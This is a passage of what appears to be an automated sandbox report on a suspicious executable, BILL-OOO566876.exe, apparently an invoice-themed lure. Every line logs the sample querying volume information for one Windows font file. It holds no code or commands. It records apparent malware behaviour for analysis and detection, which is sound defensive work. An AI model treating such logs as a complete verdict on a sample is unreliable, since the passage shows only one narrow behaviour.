                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
